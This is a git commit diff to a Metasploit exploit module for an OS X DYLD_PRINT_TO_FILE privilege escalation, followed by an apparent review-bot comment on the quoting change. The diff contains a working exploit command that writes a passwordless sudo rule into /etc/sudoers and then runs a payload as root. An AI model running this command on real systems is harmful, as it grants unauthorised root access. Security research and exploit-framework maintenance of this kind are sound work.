bug/bundler_fix
Tod Beardsley 2015-07-23 12:21:36 -05:00
parent 165cb195bf
commit 9d8dd2f8bd
No known key found for this signature in database
GPG Key ID: BD63D0A3EA19CAAC
1 changed files with 6 additions and 3 deletions


@ -17,8 +17,11 @@ class Metasploit4 < Msf::Exploit::Local
super(update_info(info,
'Name' => 'Apple OS X DYLD_PRINT_TO_FILE Privilege Escalation',
'Description' => %q{
In Mac OS X 10.10.x, the DYLD_PRINT_TO_FILE environment variable is still
supported for suid binaries. This allows an arbitrary file write as root.
In Apple OS X 10.10.4 and prior, the DYLD_PRINT_TO_FILE
environment variable, usually used for redirecting logging data to a
file, instead of the usual stderr. Due to a design error, this feature
can be abused by a local attacker to write arbitrary files as root, via
restricted, SUID root binaries.
},
'Author' => [
'Stefan Esser', # Vulnerability discovery and PoC
@ -69,7 +72,7 @@ class Metasploit4 < Msf::Exploit::Local
end
def sploit
"/bin/sh -c \"echo 'echo \\\"$(whoami) ALL=(ALL) NOPASSWD:ALL\\\" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo #{payload_file} &\""
%q{/bin/sh -c "echo 'echo \\"$(whoami) ALL=(ALL) NOPASSWD:ALL\\" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo #{payload_file} &"}
end
def binary_payload
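Review bot: In `sploit`, the new `%q{...}` literal is non-interpolating, so `#{payload_file}` is emitted as literal text rather than the path that the removed double-quoted string substituted. Inside the `sh -c` argument, an unquoted `#` at the start of a word would also be read as a shell comment, so the command would most likely end at a bare `sudo`. If the intent was only to drop the heavy backslash escaping, changing the opener from `%q{` to `%Q{` keeps interpolation, and the existing `\\"` sequences still yield `\"`. Separately, the first sentence of the new 'Description' in the first hunk has no main verb; something like "the DYLD_PRINT_TO_FILE environment variable, normally used to redirect logging data to a file instead of stderr, is still honoured for SUID binaries" would read cleanly. `binary_payload` continues outside this hunk and is not reviewed here.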